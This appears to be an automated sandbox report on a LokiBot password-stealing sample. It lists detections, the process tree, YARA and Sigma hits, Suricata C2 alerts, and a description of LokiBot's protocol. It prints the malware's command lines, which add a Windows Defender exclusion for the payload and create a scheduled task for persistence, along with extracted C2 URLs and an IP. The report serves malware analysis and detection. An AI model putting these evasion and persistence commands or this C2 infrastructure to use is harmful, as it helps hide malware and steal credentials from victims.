Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
YvVDV4cbjy.exe

Overview

General Information

Sample name:YvVDV4cbjy.exe
renamed because original name is a hash value
Original sample name:ee0558d98d1151d6ce6ebb419a05e6def3c758f703518648a03c03ed8d830726.exe
Analysis ID:1588964
MD5:de71da3a473f5cdb285d30a1d6dd333b
SHA1:ebb3e9e7fe88c5ba0c24d0411f7a0c04c9e04181
SHA256:ee0558d98d1151d6ce6ebb419a05e6def3c758f703518648a03c03ed8d830726
Tags:exeLokiuser-adrian__luca
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Lokibot
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • YvVDV4cbjy.exe (PID: 736 cmdline: "C:\Users\user\Desktop\YvVDV4cbjy.exe" MD5: DE71DA3A473F5CDB285D30A1D6DD333B)
    • powershell.exe (PID: 5768 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\YvVDV4cbjy.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 2316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2680 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HxQXdrrQ.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 3856 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 1196 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp1DE9.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • YvVDV4cbjy.exe (PID: 6584 cmdline: "C:\Users\user\Desktop\YvVDV4cbjy.exe" MD5: DE71DA3A473F5CDB285D30A1D6DD333B)
  • HxQXdrrQ.exe (PID: 1632 cmdline: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe MD5: DE71DA3A473F5CDB285D30A1D6DD333B)
    • schtasks.exe (PID: 2940 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp31BF.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • HxQXdrrQ.exe (PID: 5268 cmdline: "C:\Users\user\AppData\Roaming\HxQXdrrQ.exe" MD5: DE71DA3A473F5CDB285D30A1D6DD333B)
    • HxQXdrrQ.exe (PID: 7096 cmdline: "C:\Users\user\AppData\Roaming\HxQXdrrQ.exe" MD5: DE71DA3A473F5CDB285D30A1D6DD333B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000009.00000002.3266647288.00000000010F8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
      0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
        0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0000000A.00000002.2110971513.000000000394E000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
            • 0x17af8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
            Click to see the 52 entries
            SourceRuleDescriptionAuthorStrings
            0.2.YvVDV4cbjy.exe.402e1f0.3.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              0.2.YvVDV4cbjy.exe.402e1f0.3.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
              • 0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
              0.2.YvVDV4cbjy.exe.402e1f0.3.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
              • 0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
              0.2.YvVDV4cbjy.exe.402e1f0.3.unpackLoki_1Loki Payloadkevoreilly
              • 0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW
              • 0x133fc:$a2: last_compatible_version
              0.2.YvVDV4cbjy.exe.402e1f0.3.unpackLokibotdetect Lokibot in memoryJPCERT/CC Incident Response Group
              • 0x123ff:$des3: 68 03 66 00 00
              • 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X
              • 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
              Click to see the 63 entries

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\YvVDV4cbjy.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\YvVDV4cbjy.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\YvVDV4cbjy.exe", ParentImage: C:\Users\user\Desktop\YvVDV4cbjy.exe, ParentProcessId: 736, ParentProcessName: YvVDV4cbjy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\YvVDV4cbjy.exe", ProcessId: 5768, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\YvVDV4cbjy.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\YvVDV4cbjy.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\YvVDV4cbjy.exe", ParentImage: C:\Users\user\Desktop\YvVDV4cbjy.exe, ParentProcessId: 736, ParentProcessName: YvVDV4cbjy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\YvVDV4cbjy.exe", ProcessId: 5768, ProcessName: powershell.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp31BF.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp31BF.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe, ParentImage: C:\Users\user\AppData\Roaming\HxQXdrrQ.exe, ParentProcessId: 1632, ParentProcessName: HxQXdrrQ.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp31BF.tmp", ProcessId: 2940, ProcessName: schtasks.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp1DE9.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp1DE9.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\YvVDV4cbjy.exe", ParentImage: C:\Users\user\Desktop\YvVDV4cbjy.exe, ParentProcessId: 736, ParentProcessName: YvVDV4cbjy.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp1DE9.tmp", ProcessId: 1196, ProcessName: schtasks.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\YvVDV4cbjy.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\YvVDV4cbjy.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\YvVDV4cbjy.exe", ParentImage: C:\Users\user\Desktop\YvVDV4cbjy.exe, ParentProcessId: 736, ParentProcessName: YvVDV4cbjy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\YvVDV4cbjy.exe", ProcessId: 5768, ProcessName: powershell.exe

              Persistence and Installation Behavior

              barindex
              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp1DE9.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp1DE9.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\YvVDV4cbjy.exe", ParentImage: C:\Users\user\Desktop\YvVDV4cbjy.exe, ParentProcessId: 736, ParentProcessName: YvVDV4cbjy.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HxQXdrrQ" /XML "C:\Users\user\AppData\Local\Temp\tmp1DE9.tmp", ProcessId: 1196, ProcessName: schtasks.exe
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-11T07:44:26.317949+010020243121A Network Trojan was detected192.168.2.54970794.156.177.4180TCP
              2025-01-11T07:44:27.217417+010020243121A Network Trojan was detected192.168.2.54970894.156.177.4180TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-11T07:44:25.599550+010020253811Malware Command and Control Activity Detected192.168.2.54970794.156.177.4180TCP
              2025-01-11T07:44:26.514901+010020253811Malware Command and Control Activity Detected192.168.2.54970894.156.177.4180TCP
              2025-01-11T07:44:27.307244+010020253811Malware Command and Control Activity Detected192.168.2.54970994.156.177.4180TCP
              2025-01-11T07:44:28.191011+010020253811Malware Command and Control Activity Detected192.168.2.54971194.156.177.4180TCP
              2025-01-11T07:44:29.096261+010020253811Malware Command and Control Activity Detected192.168.2.54971394.156.177.4180TCP
              2025-01-11T07:44:30.130805+010020253811Malware Command and Control Activity Detected192.168.2.54971494.156.177.4180TCP
              2025-01-11T07:44:31.013403+010020253811Malware Command and Control Activity Detected192.168.2.54971594.156.177.4180TCP
              2025-01-11T07:44:32.794115+010020253811Malware Command and Control Activity Detected192.168.2.54971694.156.177.4180TCP
              2025-01-11T07:44:33.799410+010020253811Malware Command and Control Activity Detected192.168.2.54971794.156.177.4180TCP
              2025-01-11T07:44:34.671202+010020253811Malware Command and Control Activity Detected192.168.2.54971894.156.177.4180TCP
              2025-01-11T07:44:35.543288+010020253811Malware Command and Control Activity Detected192.168.2.54971994.156.177.4180TCP
              2025-01-11T07:44:36.441284+010020253811Malware Command and Control Activity Detected192.168.2.54972094.156.177.4180TCP
              2025-01-11T07:44:37.566875+010020253811Malware Command and Control Activity Detected192.168.2.54972194.156.177.4180TCP
              2025-01-11T07:44:38.454563+010020253811Malware Command and Control Activity Detected192.168.2.54972294.156.177.4180TCP
              2025-01-11T07:44:39.345173+010020253811Malware Command and Control Activity Detected192.168.2.54972494.156.177.4180TCP
              2025-01-11T07:44:40.457078+010020253811Malware Command and Control Activity Detected192.168.2.54972594.156.177.4180TCP
              2025-01-11T07:44:41.331671+010020253811Malware Command and Control Activity Detected192.168.2.54973094.156.177.4180TCP
              2025-01-11T07:44:42.253637+010020253811Malware Command and Control Activity Detected192.168.2.54973894.156.177.4180TCP
              2025-01-11T07:44:43.098513+010020253811Malware Command and Control Activity Detected192.168.2.54974394.156.177.4180TCP
              2025-01-11T07:44:43.980050+010020253811Malware Command and Control Activity Detected192.168.2.54974994.156.177.4180TCP
              2025-01-11T07:44:44.852549+010020253811Malware Command and Control Activity Detected192.168.2.54975594.156.177.4180TCP
              2025-01-11T07:44:45.728633+010020253811Malware Command and Control Activity Detected192.168.2.54976194.156.177.4180TCP
              2025-01-11T07:44:46.611946+010020253811Malware Command and Control Activity Detected192.168.2.54977194.156.177.4180TCP
              2025-01-11T07:44:47.470301+010020253811Malware Command and Control Activity Detected192.168.2.54977794.156.177.4180TCP
              2025-01-11T07:44:48.343700+010020253811Malware Command and Control Activity Detected192.168.2.54978494.156.177.4180TCP
              2025-01-11T07:44:49.359567+010020253811Malware Command and Control Activity Detected192.168.2.54979094.156.177.4180TCP
              2025-01-11T07:44:50.222647+010020253811Malware Command and Control Activity Detected192.168.2.54979694.156.177.4180TCP
              2025-01-11T07:44:51.232327+010020253811Malware Command and Control Activity Detected192.168.2.54980494.156.177.4180TCP
              2025-01-11T07:44:52.093577+010020253811Malware Command and Control Activity Detected192.168.2.54981194.156.177.4180TCP
              2025-01-11T07:44:52.995437+010020253811Malware Command and Control Activity Detected192.168.2.54981694.156.177.4180TCP
              2025-01-11T07:44:53.931455+010020253811Malware Command and Control Activity Detected192.168.2.54982194.156.177.4180TCP
              2025-01-11T07:44:54.835228+010020253811Malware Command and Control Activity Detected192.168.2.54982694.156.177.4180TCP
              2025-01-11T07:44:55.697158+010020253811Malware Command and Control Activity Detected192.168.2.54983494.156.177.4180TCP
              2025-01-11T07:44:56.576534+010020253811Malware Command and Control Activity Detected192.168.2.54984094.156.177.4180TCP
              2025-01-11T07:44:57.442816+010020253811Malware Command and Control Activity Detected192.168.2.54984994.156.177.4180TCP
              2025-01-11T07:44:58.295544+010020253811Malware Command and Control Activity Detected192.168.2.54985594.156.177.4180TCP
              2025-01-11T07:44:59.483479+010020253811Malware Command and Control Activity Detected192.168.2.54986294.156.177.4180TCP
              2025-01-11T07:45:00.369812+010020253811Malware Command and Control Activity Detected192.168.2.54986994.156.177.4180TCP
              2025-01-11T07:45:01.246794+010020253811Malware Command and Control Activity Detected192.168.2.54987894.156.177.4180TCP
              2025-01-11T07:45:02.314357+010020253811Malware Command and Control Activity Detected192.168.2.54988494.156.177.4180TCP
              2025-01-11T07:45:03.331453+010020253811Malware Command and Control Activity Detected192.168.2.54989194.156.177.4180TCP
              2025-01-11T07:45:04.209206+010020253811Malware Command and Control Activity Detected192.168.2.54989994.156.177.4180TCP
              2025-01-11T07:45:05.082273+010020253811Malware Command and Control Activity Detected192.168.2.54990594.156.177.4180TCP
              2025-01-11T07:45:05.957442+010020253811Malware Command and Control Activity Detected192.168.2.54991194.156.177.4180TCP
              2025-01-11T07:45:07.173718+010020253811Malware Command and Control Activity Detected192.168.2.54991994.156.177.4180TCP
              2025-01-11T07:45:08.037685+010020253811Malware Command and Control Activity Detected192.168.2.54992894.156.177.4180TCP
              2025-01-11T07:45:08.914118+010020253811Malware Command and Control Activity Detected192.168.2.54993494.156.177.4180TCP
              2025-01-11T07:45:09.933380+010020253811Malware Command and Control Activity Detected192.168.2.54993994.156.177.4180TCP
              2025-01-11T07:45:10.851770+010020253811Malware Command and Control Activity Detected192.168.2.54994594.156.177.4180TCP
              2025-01-11T07:45:11.717555+010020253811Malware Command and Control Activity Detected192.168.2.54995394.156.177.4180TCP
              2025-01-11T07:45:12.578126+010020253811Malware Command and Control Activity Detected192.168.2.54996194.156.177.4180TCP
              2025-01-11T07:45:13.478552+010020253811Malware Command and Control Activity Detected192.168.2.54996894.156.177.4180TCP
              2025-01-11T07:45:14.340906+010020253811Malware Command and Control Activity Detected192.168.2.54997494.156.177.4180TCP
              2025-01-11T07:45:15.208568+010020253811Malware Command and Control Activity Detected192.168.2.54998094.156.177.4180TCP
              2025-01-11T07:45:16.076063+010020253811Malware Command and Control Activity Detected192.168.2.54998694.156.177.4180TCP
              2025-01-11T07:45:16.950781+010020253811Malware Command and Control Activity Detected192.168.2.54999394.156.177.4180TCP
              2025-01-11T07:45:17.828451+010020253811Malware Command and Control Activity Detected192.168.2.55000294.156.177.4180TCP
              2025-01-11T07:45:18.943087+010020253811Malware Command and Control Activity Detected192.168.2.55001094.156.177.4180TCP
              2025-01-11T07:45:19.816581+010020253811Malware Command and Control Activity Detected192.168.2.55001694.156.177.4180TCP
              2025-01-11T07:45:20.695534+010020253811Malware Command and Control Activity Detected192.168.2.55002294.156.177.4180TCP
              2025-01-11T07:45:21.906791+010020253811Malware Command and Control Activity Detected192.168.2.55002794.156.177.4180TCP
              2025-01-11T07:45:22.801196+010020253811Malware Command and Control Activity Detected192.168.2.55003794.156.177.4180TCP
              2025-01-11T07:45:23.654933+010020253811Malware Command and Control Activity Detected192.168.2.55004394.156.177.4180TCP
              2025-01-11T07:45:24.666068+010020253811Malware Command and Control Activity Detected192.168.2.55004494.156.177.4180TCP
              2025-01-11T07:45:25.549065+010020253811Malware Command and Control Activity Detected192.168.2.55004594.156.177.4180TCP
              2025-01-11T07:45:26.431338+010020253811Malware Command and Control Activity Detected192.168.2.55004694.156.177.4180TCP
              2025-01-11T07:45:27.499770+010020253811Malware Command and Control Activity Detected192.168.2.55004794.156.177.4180TCP
              2025-01-11T07:45:28.375675+010020253811Malware Command and Control Activity Detected192.168.2.55004894.156.177.4180TCP
              2025-01-11T07:45:29.280517+010020253811Malware Command and Control Activity Detected192.168.2.55004994.156.177.4180TCP
              2025-01-11T07:45:30.122846+010020253811Malware Command and Control Activity Detected192.168.2.55005094.156.177.4180TCP
              2025-01-11T07:45:30.991478+010020253811Malware Command and Control Activity Detected192.168.2.55005194.156.177.4180TCP
              2025-01-11T07:45:31.859651+010020253811Malware Command and Control Activity Detected192.168.2.55005294.156.177.4180TCP
              2025-01-11T07:45:32.741029+010020253811Malware Command and Control Activity Detected192.168.2.55005394.156.177.4180TCP
              2025-01-11T07:45:33.607086+010020253811Malware Command and Control Activity Detected192.168.2.55005494.156.177.4180TCP
              2025-01-11T07:45:34.487775+010020253811Malware Command and Control Activity Detected192.168.2.55005594.156.177.4180TCP
              2025-01-11T07:45:35.345550+010020253811Malware Command and Control Activity Detected192.168.2.55005694.156.177.4180TCP
              2025-01-11T07:45:36.525051+010020253811Malware Command and Control Activity Detected192.168.2.55005794.156.177.4180TCP
              2025-01-11T07:45:37.400062+010020253811Malware Command and Control Activity Detected192.168.2.55005894.156.177.4180TCP
              2025-01-11T07:45:38.410807+010020253811Malware Command and Control Activity Detected192.168.2.55005994.156.177.4180TCP
              2025-01-11T07:45:39.302388+010020253811Malware Command and Control Activity Detected192.168.2.55006094.156.177.4180TCP
              2025-01-11T07:45:40.165796+010020253811Malware Command and Control Activity Detected192.168.2.55006194.156.177.4180TCP
              2025-01-11T07:45:41.015055+010020253811Malware Command and Control Activity Detected192.168.2.55006294.156.177.4180TCP
              2025-01-11T07:45:42.032602+010020253811Malware Command and Control Activity Detected192.168.2.55006394.156.177.4180TCP
              2025-01-11T07:45:42.904942+010020253811Malware Command and Control Activity Detected192.168.2.55006494.156.177.4180TCP
              2025-01-11T07:45:43.761690+010020253811Malware Command and Control Activity Detected192.168.2.55006594.156.177.4180TCP
              2025-01-11T07:45:44.721124+010020253811Malware Command and Control Activity Detected192.168.2.55006694.156.177.4180TCP
              2025-01-11T07:45:45.593770+010020253811Malware Command and Control Activity Detected192.168.2.55006794.156.177.4180TCP
              2025-01-11T07:45:46.450873+010020253811Malware Command and Control Activity Detected192.168.2.55006894.156.177.4180TCP
              2025-01-11T07:45:47.341627+010020253811Malware Command and Control Activity Detected192.168.2.55006994.156.177.4180TCP
              2025-01-11T07:45:48.223334+010020253811Malware Command and Control Activity Detected192.168.2.55007094.156.177.4180TCP
              2025-01-11T07:45:49.103767+010020253811Malware Command and Control Activity Detected192.168.2.55007194.156.177.4180TCP
              2025-01-11T07:45:49.999889+010020253811Malware Command and Control Activity Detected192.168.2.55007294.156.177.4180TCP
              2025-01-11T07:45:50.897746+010020253811Malware Command and Control Activity Detected192.168.2.55007394.156.177.4180TCP
              2025-01-11T07:45:51.767772+010020253811Malware Command and Control Activity Detected192.168.2.55007494.156.177.4180TCP
              2025-01-11T07:45:52.610435+010020253811Malware Command and Control Activity Detected192.168.2.55007594.156.177.4180TCP
              2025-01-11T07:45:53.849528+010020253811Malware Command and Control Activity Detected192.168.2.55007694.156.177.4180TCP
              2025-01-11T07:45:54.733799+010020253811Malware Command and Control Activity Detected192.168.2.55007794.156.177.4180TCP
              2025-01-11T07:45:55.638595+010020253811Malware Command and Control Activity Detected192.168.2.55007894.156.177.4180TCP
              2025-01-11T07:45:56.514453+010020253811Malware Command and Control Activity Detected192.168.2.55007994.156.177.4180TCP
              2025-01-11T07:45:57.364760+010020253811Malware Command and Control Activity Detected192.168.2.55008094.156.177.4180TCP
              2025-01-11T07:45:58.382542+010020253811Malware Command and Control Activity Detected192.168.2.55008194.156.177.4180TCP
              2025-01-11T07:45:59.299658+010020253811Malware Command and Control Activity Detected192.168.2.55008294.156.177.4180TCP
              2025-01-11T07:46:00.145771+010020253811Malware Command and Control Activity Detected192.168.2.55008394.156.177.4180TCP
              2025-01-11T07:46:00.982126+010020253811Malware Command and Control Activity Detected192.168.2.55008494.156.177.4180TCP
              2025-01-11T07:46:01.873444+010020253811Malware Command and Control Activity Detected192.168.2.55008594.156.177.4180TCP
              2025-01-11T07:46:02.873702+010020253811Malware Command and Control Activity Detected192.168.2.55008694.156.177.4180TCP
              2025-01-11T07:46:03.722760+010020253811Malware Command and Control Activity Detected192.168.2.55008794.156.177.4180TCP
              2025-01-11T07:46:04.607701+010020253811Malware Command and Control Activity Detected192.168.2.55008894.156.177.4180TCP
              2025-01-11T07:46:05.489996+010020253811Malware Command and Control Activity Detected192.168.2.55008994.156.177.4180TCP
              2025-01-11T07:46:06.353603+010020253811Malware Command and Control Activity Detected192.168.2.55009094.156.177.4180TCP
              2025-01-11T07:46:07.255437+010020253811Malware Command and Control Activity Detected192.168.2.55009194.156.177.4180TCP
